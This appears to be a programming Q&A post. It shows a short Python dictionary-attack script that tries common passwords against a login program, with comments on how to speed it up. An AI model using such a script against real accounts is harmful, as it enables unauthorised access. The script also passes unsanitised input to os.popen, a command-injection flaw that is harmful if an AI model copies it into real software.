# Efficient Password Cracker

Tags: python, performance, passwords

I've begun work on a rudimentary password, code shown here:

```
import time
import os

with open('usernames') as f:
    username_list = f.read().splitlines()

start_time = time.time()

for username in username_list:
    with open('MostCommonPWs') as password_list:
        for password in password_list:
             output = os.popen('python3 Login.pyc ' + username + ' ' + password).read()
             if "Login successful." in output:
                print("The correct password for", username, "is:", password)
                break

end_time = time.time()
print("Runtime:", end_time - start_time)
```

In this code block, 'usernames' is just a list of usernames and 'MostCommonPWs' is a list of common passwords. Then, the intention is it uses a login mechanism (Login.pyc) and spits to the terminal "Login.pyc 'current username iteration' 'current password iteration'". It's a tad convoluted, so if anyone has any questions on how it works, just let me know!

Anyway, this all works correctly, but my question is, right now, the list of common passwords I have is only about 20 passwords long. Is there any way to make this code block more efficient so that it could handle a password list of 1,000 - 100,000 passwords, or would this require a different sort of attack altogether. Thank you!

Comment: Spawning a process for each password is the bottleneck. I guess there is no way around it in your case though.

Comment: No sane login scheme would allow a list of passwords...

Comment: First thought would be threading to allow handling more than one subprocess at once.